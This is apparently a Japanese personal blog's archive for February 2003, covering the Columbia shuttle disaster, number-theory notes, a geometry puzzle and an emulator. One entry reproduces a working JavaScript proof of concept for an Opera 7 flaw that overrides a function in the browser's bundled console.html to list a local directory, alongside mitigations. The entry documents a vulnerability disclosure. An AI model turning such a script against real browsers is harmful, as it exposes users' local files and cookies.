この修正プログラムは Windows Update でインストールできます。

日本語ページが公開されたので追記

Internet Explorer 用の累積的な修正プログラム (810847) (MS03-004) (Microsoft、2 月 6 日)

そこに合成数があるから…

| コメント(0)

Factorizations of 133...331 (133...331 の素因数分解)

Factorizations of 144...441 (144...441 の素因数分解)

Factorizations of 155...551 (155...551 の素因数分解)

Factorizations of 166...661 (166...661 の素因数分解)

Factorizations of 177...771 (177...771 の素因数分解)

Factorizations of 188...881 (188...881 の素因数分解)

Factorizations of 199...991 (199...991 の素因数分解)

Factorizations of 311...113 (311...113 の素因数分解)

Factorizations of 322...223 (322...223 の素因数分解)

Factorizations of 344...443 (344...443 の素因数分解)

Factorizations of 355...553 (355...553 の素因数分解)

Factorizations of 377...773 (377...773 の素因数分解)

Factorizations of 388...883 (388...883 の素因数分解)

Factorizations of 711...117 (711...117 の素因数分解)

Factorizations of 722...227 (722...227 の素因数分解)

Factorizations of 744...447 (744...447 の素因数分解)

Factorizations of 755...557 (755...557 の素因数分解)

Factorizations of 766...667 (766...667 の素因数分解)

Factorizations of 788...887 (788...887 の素因数分解)

Factorizations of 799...997 (799...997 の素因数分解)

Factorizations of 911...119 (911...119 の素因数分解)

Factorizations of 922...229 (922...229 の素因数分解)

Factorizations of 944...449 (944...449 の素因数分解)

Factorizations of 955...559 (955...559 の素因数分解)

Factorizations of 988...889 (988...889 の素因数分解)

メモ

100...001 = R(2*n)/R(n)

122...221 = 11*R(n)

733...337 = 11*(2*10^n+1)/3

977...779 = 11*(8*10^n+1)/9

R(n) = (10^n-1)/9(レピュニット)

Opera 7.01 for Windows

| コメント(0)

Opera 7 for Windows final の脆弱性の一部または全部が Opera 7.01 for Windows で修正されている模様。手元では上の実験が動きませんでした。

これを書いている時点では Opera Software のページに 7.01 に関する記述が見当たらないので、インストールは自己責任でお願いします。

ftp://ftp.opera.com/pub/opera/win/701/en/std/ow32enen701.exe …Java なし

ftp://ftp.opera.com/pub/opera/win/701/en/java/ow32enen701j.exe …Java あり

Opera Software

Opera 7 for Windows final の脆弱性

| コメント(0)

Opera 7 for Windows はβ版で多くの脆弱性が指摘され、final ではすべて修正されているだろうと思ったのですが、修正されていないものもあったようです。下記の GreyMagic のページに Cookie とローカルディスクの内容の漏洩の実験があります。

Opera's Security Model is Highly Vulnerable (GreyMagic、2 月 4 日)→ @nifty 翻訳

Opera 7 for Windows final ではページの中で定義された JavaScript の関数を window オブジェクトからアクセスすることができるようになっており、それを外部からオーバーライドすることができるため、その関数が定義されてから使われるまでの間に書き換えることで外部から任意のスクリプトを流し込むことができてしまいます。さらに悪いことに、Opera 7 には標準で console.html というファイルが付属しており、この中に 1 秒間隔で実行される関数があるため、その関数をオーバーライドすることで簡単にローカルディスクにアクセスできてしまいます。

ローカルディスクの C:/Program Files ディレクトリの一覧を表示する実験。

opera7test.htm
<textarea id="d" cols="80" rows="25"></textarea>
<script>
<!--
var d = document.getElementById('d');
var w = window.open('file://localhost/console.html', '', '');
function step1() {
w.blur();
w.frames.msgframe.location.href = 'file://localhost/c:/Program Files';
w.pollForErrors = step2;
}
function step2() {
w.pollForErrors = function () {};
var l = w.frames.msgframe.document.links;
var i, s = '';
for (i = 1; i < l.length; i++) {
s += l[i].innerText + '\n';
}
w.close();
d.value = s;
}
setTimeout('w.pollForErrors = step1', 1000);
// -->
</script>

Opera 7 for Windows final のその他の脆弱性

Phantom of the Opera (GreyMagic)→ @nifty 翻訳

Opera Images (GreyMagic)→ @nifty 翻訳

Opera: What's Next (GreyMagic)→ @nifty 翻訳

Sniffing Opera's Tracks (GreyMagic)→ @nifty 翻訳

対策0

修正されるまで Opera 7 を使わない。

対策1

JavaScript の実行を禁止する。

対策

Opera 7.01 for Windows にアップデートする。

関連記事

発表されたばかりの「Opera 7」に早くもセキュリティホール (impress INTERNET Watch、2 月 4 日)

たられば

| コメント(0)

スペースシャトルは打ち上げ直後のトラブルに備えて毎回最低 2 箇所の緊急着陸地を確保している。11 月 23 日の日記にあるように、緊急着陸地の天候不良という理由で打ち上げが延期されたこともある。コロンビアの打ち上げ直後に外部燃料タンクの断熱材がはがれて翼の耐熱タイルを損傷したと思われるのは、打ち上げからおよそ 1 分 20 秒後のことだった。そのような現象が起きる可能性があることは打ち上げ前からわかっていたという。それならば、その現象が発生していないかリアルタイムに監視して、発生した場合には打ち上げから 3 分以内にミッション中止・緊急着陸の判断ができるような体制を整えていれば、7 人の宇宙飛行士は命を落とさずにすんだかもしれない。

不可能だった救出 想定外の空中分解 (Mainichi INTERACTIVE、2 月 4 日)

メルセンヌ素数

| コメント(0)

GIMPS によると、1999 年に発見された 2098960 桁のメルセンヌ素数 2^6972593-1 が小さいほうから数えて 38 番目のメルセンヌ素数であることがダブルチェックにより確定しました。この数は現在知られている中で 2 番目に大きい素数です。現在知られている最大の素数は 2001 年に発見された 4053946 桁のメルセンヌ素数 2^13466917-1 ですが、この数が小さいほうから数えて 39 番目のメルセンヌ素数かどうかはまだ確定していません。

Mersenne Prime Search (GIMPS)→ @nifty 翻訳

The Largest Known Primes (Chris K. Caldwell さん)→@nifty 翻訳

シャトル事故関連

| コメント(0)

コロンビアの事故の原因が早く解明されることはよいことなのですが、それらしい可能性が次々と指摘されてゆく報道を見ていると「そんなに簡単に解明できていいのか?」という自己矛盾のような疑問がわいてきます。チャレンジャーの事故の後、技術者 1 人 1 人に至るまで安全性に関する懸念を表明してシャトルの打ち上げをストップさせることができるようになり、スペースシャトルが既知の原因で空中爆発などという重大事故を起こすことはあり得なくなったはずです。

NASA focusing on 'Achilles' heel' of shuttle (CNN.com、2 月 3 日)→@nifty 翻訳

シャトルの「アキレス腱」車輪格納扉に焦点 NASA (CNN.co.jp、2 月 4 日)

「ポップコーン現象」の可能性も NASA調査 (Mainichi INTERACTIVE、2 月 3 日)

頭の体操の答え

| コメント(0)

2 月 1 日の問題

平面上に正 17 角形があります。最初に、正 17 角形の内部(辺を含まない)に適当に 13 個の点を置き、辺上(頂点を含まない)に適当に 9 個の点を置きます。次に、17 個の頂点と内部の 13 個の点と辺上の 9 個の点の合計 39 個の点の中から適当に 2 点を選んでそれらを線分で結ぶことを繰り返します。ただし、結ぶべき 39 個の点以外の場所で線分同士が交わってはいけません。線分で結ぶことができる点をすべて結ぶと、正 17 角形の内部が 3 角形で埋め尽くされます。このとき、3 角形は全部でいくつあるでしょうか。

答え

正 17 角形の内角の和は 180×(17-2) 度なので、頂点に集まる 3 角形の内角の和は 180×(17-2) 度。全角は 360 度なので、内部の 13 個の点に集まる 3 角形の内角の和は 360×13 度。辺は直線なので、辺上の 9 個の点に集まる 3 角形の内角の和は 180×9 度。求める 3 角形の個数を n 個とすると、n 個の 3 角形の内角の和は 180×n 度。180×n = 180×(17-2) + 360×13 + 180×9
n = (17-2) + 2×13 + 9 = 15 + 26 + 9 = 50
∴50 個

内部の点を 1 個増やすと 3 角形が 2 個増え、辺上の点を 1 個増やすと 3 角形が 1 個増える、という方法でも解くことができます。

xyzzy version 0.2.2.233

| コメント(0)

シャトル事故関連

| コメント(0)

毎日新聞

毛利さん、涙浮かべ会見「この事故乗り越える」 (Mainichi INTERACTIVE、2 月 2 日)

「地球は美しい」家族らに最期の感動メール (Mainichi INTERACTIVE、2 月 2 日)

米政権 イラク絡み「戸惑い」と「焦り」 (Mainichi INTERACTIVE、2 月 3 日)

宇宙ステーション 往復、大幅に制限 (Mainichi INTERACTIVE、2 月 3 日)

圧力計が不能に 当面打ち上げ見送り NASA (Mainichi INTERACTIVE、2 月 3 日)

「まさかこんなことが」 向井千秋さんが会見 (Mainichi INTERACTIVE、2 月 3 日)

飛行士7人とみられる遺体を発見 NASA (Mainichi INTERACTIVE、2 月 3 日)

ブッシュ米大統領が4日の追悼式に出席へ (Mainichi INTERACTIVE、2 月 3 日)

けろぴー開発終了

| コメント(0)

Windows 用 X68000 エミュレータの「けろぴー」(けんじょさん)が開発終了とのことです。3 年間お疲れ様でした。

けろぴーのぺぇじ…だったとこ (けんじょさん) … 開発終了

Keropi - History … けろぴーの歴史と v0.61 までのダウンロード

けろぴー関連ツール

うさの倉庫 (うささん) … けろぴー v0.65

EX68 X68000 Emulator for Windows95/98/NT/2000 (yamama さん) … 開発終了

WinX68k 高速版 /WinX68030 の部屋 (tamu さん)

XM6 (PI. さん)

X68000 Emulator For Macintosh (YOH さん) …Macintosh 用

無償公開されたシャープのソフトウェア (X68000 LIBRARY) …IPL-ROM(BIOS)、Human68k(OS)、C コンパイラ、SX-WINDOW などのダウンロードページ

国際宇宙ステーションの物資補給のために、日本時間のきょう午後 9 時 59 分(モスクワ時間のきょう午後 3 時 59 分)、カザフスタンにあるバイコヌール宇宙基地からロシアの無人補給船プログレス M-247 がソユーズロケットで打ち上げられました。

国際宇宙ステーションは今回のスペースシャトルの事故によって主要な物資輸送手段を失うことになったため、建設計画の大幅な見直しが迫られています。

下記の NASDA のページで補給船のドッキング前後の国際宇宙ステーションの形状が図解されています。

Russian spacecraft takes off for ISS (ABC Online, Australia、2 月 2 日)→@nifty 翻訳

Russia sending resupply rocket to space station (CNN.com、2 月 2 日)→@nifty 翻訳

Russian rocket blasts off for ISS (BBC NEWS、2 月 2 日)→@nifty 翻訳

02.02.2003. Запуск космического корабля Прогресс - М с космодрома Байконур (ロシア航空宇宙局、2 月 2 日)→ AltaVista 翻訳(英語)SYSTRAN+SYSTRAN 翻訳

国際宇宙ステーションへの補給フライト 10P (NASDA)

シャトル事故

| コメント(0)

NASA の公式発表ページ

NASA - Space Shuttle Columbia and Her Crew (NASA)→ SYSTRAN 翻訳

NASDA のプレスリリース

スペースシャトル「コロンビア号」の事故について (NASDA プレスリリース、2 月 2 日)

テキサス州の新聞

HoustonChronicle.com@nifty 翻訳 … ヒューストン・クロニクル

DallasNews.com@nifty 翻訳 … ダラス・ニュース

朝日新聞の特集ページ(既出)

ニュース特集 > シャトル空中分解 (asahi.com)

宇宙関連情報のページ(既出を含む)

Spaceflight Now@nifty 翻訳

SPACE.com@nifty 翻訳

CNN.com - Science & Space@nifty 翻訳

The Astrobiology Web@nifty 翻訳

宇宙作家クラブ ニュース掲示板

星の好きな人のための新着情報 (福原直人さん)

NASDA の実験ミッションについて

STS-107 タンパク質結晶成長実験/ラットを用いた宇宙実験 (NASDA)

シャトル事故

| コメント(0)

遺体発見の報道

シャトル乗組員か? テキサス州で一部遺体発見 (CNN.co.jp、2 月 2 日)

乗員の遺体の一部を発見 米テキサス州 (Mainichi INTERACTIVE、2 月 2 日)

シャトル空中分解、遺体?発見 (Yomiuri On-Line、2 月 2 日)

シャトル事故

| コメント(0)

16 日のスペースシャトル・コロンビアの打ち上げ時に燃料タンクの断熱材の一部が脱落してシャトルの左翼に当たっており、このときに左翼の断熱材を損傷していた可能性があるようです。それが大気圏再突入時の左翼の異常加熱の主な原因かどうかはわかりません。

事故の原因が判明して対策が整うまで今後のスペースシャトルによる有人宇宙飛行の計画はすべて延期されますが、それには年単位の期間がかかることが予想されます。そうなると国際宇宙ステーションに常駐している 3 人の乗組員が交代できなくなってしまいますが、国際宇宙ステーションには緊急脱出用のソユーズ宇宙船がドッキングしているので乗組員はこれを利用して帰還することができます。

NHK ニュース

広範囲で破片発見の報道 (NHK ニュース、2 月 2 日)

スペースシャトル 墜落 (NHK ニュース、2 月 2 日)

調査チーム設け原因調査へ (NHK ニュース、2 月 2 日)

今後の宇宙開発に影響必至 (NHK ニュース、2 月 2 日)

破片はテキサス東部に集中 (NHK ニュース、2 月 2 日)

NASA 事故直前左翼に異常 (NHK ニュース、2 月 2 日)

ブッシュ大統領が緊急声明 (NHK ニュース、2 月 2 日)

原因判明まで打ち上げ停止 (NHK ニュース、2 月 2 日)

ステーション乗組員 帰還可能 (NHK ニュース、2 月 2 日)

打ち上げ時“左翼に断熱材” (NHK ニュース、2 月 2 日)

米大統領 原因の早期解明指示 (NHK ニュース、2 月 2 日)

破片落下 1000件近い通報 (NHK ニュース、2 月 2 日)

シャトル事故

| コメント(0)

スペースシャトル・コロンビアが大気圏突入後突入中に空中分解した直接的な原因は、左翼が異常過熱によって脱落し、時速 2 万 km の速度のまま姿勢を崩したためである可能性があるとのこと。異常過熱の原因は不明。

ロイター

Shuttle Columbia Disaster, Seven Astronauts Dead (Reuters、2 月 1 日)→@nifty 翻訳

朝日新聞

ニュース特集 > シャトル空中分解 (asahi.com)

毎日新聞

米大統領、急きょホワイトハウスへ (Mainichi INTERACTIVE、2 月 2 日)

初の宇宙飛行士も搭乗 イスラエル衝撃 (Mainichi INTERACTIVE、2 月 2 日)

最悪の惨事に沈うつな空気に包まれる 全米 (Mainichi INTERACTIVE、2 月 2 日)

米国の対イラク政策にも微妙な影 (Mainichi INTERACTIVE、2 月 2 日)

宇宙開発に影響も 有人飛行は凍結確実に (Mainichi INTERACTIVE、2 月 2 日)

テロの可能性を否定 米政府関係者 (Mainichi INTERACTIVE、2 月 2 日)

「生存はないだろう」 毛利さん悲報に肩落とす (Mainichi INTERACTIVE、2 月 2 日)

空中分解を確認 着陸寸前に爆発か (Mainichi INTERACTIVE、2 月 2 日)

空中分解で7人全員死亡 米大統領が哀悼の意 (Mainichi INTERACTIVE、2 月 2 日)

機体左側の異常で空中分解 NASA当局者会見 (Mainichi INTERACTIVE、2 月 2 日)

「痛恨の思い」 宇宙開発事業団理事が哀悼の意 (Mainichi INTERACTIVE、2 月 2 日)

スペースシャトル・チャレンジャーの悲劇がスペースシャトル・コロンビアで繰り返されてしまいました。NASA は 7 人の乗組員全員が死亡したと発表しました。

Seven astronauts killed as shuttle shatters (CNN.com、2 月 1 日)→@nifty 翻訳

宇宙作家クラブ ニュース掲示板

シャトル空中分解し墜落 帰還直前、乗員7人絶望 (asahi.com、2 月 2 日)

シャトル事故: 空中分解を確認 着陸寸前に爆発か (Mainichi INTERACTIVE、2 月 2 日)

シャトル・コロンビアが帰還直前に分解、乗組員7人死亡 (CNN.co.jp、2 月 2 日)

Shuttle Columbia lost (SpaceflightNow、2 月 1 日)→@nifty 翻訳

Mission Status Center@nifty 翻訳

Statement by President Bush@nifty 翻訳 … ブッシュ大統領の声明

Columbia Destroyed During Re-Entry, Crew Lost (SPACE.com、2 月 1 日)→@nifty 翻訳

COLUMBIA LOST OVER TEXAS (FLORIDA TODAY: STS-107 mission coverage)→@nifty 翻訳

STS-107 Columbia landing journal (FLORIDA TODAY)→@nifty 翻訳

頭の体操

| コメント(0)

平面上に正 17 角形があります。最初に、正 17 角形の内部(辺を含まない)に適当に 13 個の点を置き、辺上(頂点を含まない)に適当に 9 個の点を置きます。次に、17 個の頂点と内部の 13 個の点と辺上の 9 個の点の合計 39 個の点の中から適当に 2 点を選んでそれらを線分で結ぶことを繰り返します。ただし、結ぶべき 39 個の点以外の場所で線分同士が交わってはいけません。線分で結ぶことができる点をすべて結ぶと、正 17 角形の内部が 3 角形で埋め尽くされます。このとき、3 角形は全部でいくつあるでしょうか。

このアーカイブについて

このページには、2003年2月に書かれた記事が新しい順に公開されています。

前のアーカイブは2003年1月です。

次のアーカイブは2003年3月です。

最近のコンテンツはインデックスページで見られます。過去に書かれたものはアーカイブのページで見られます。

月別 アーカイブ

ウェブページ

Powered by Movable Type 6.3.3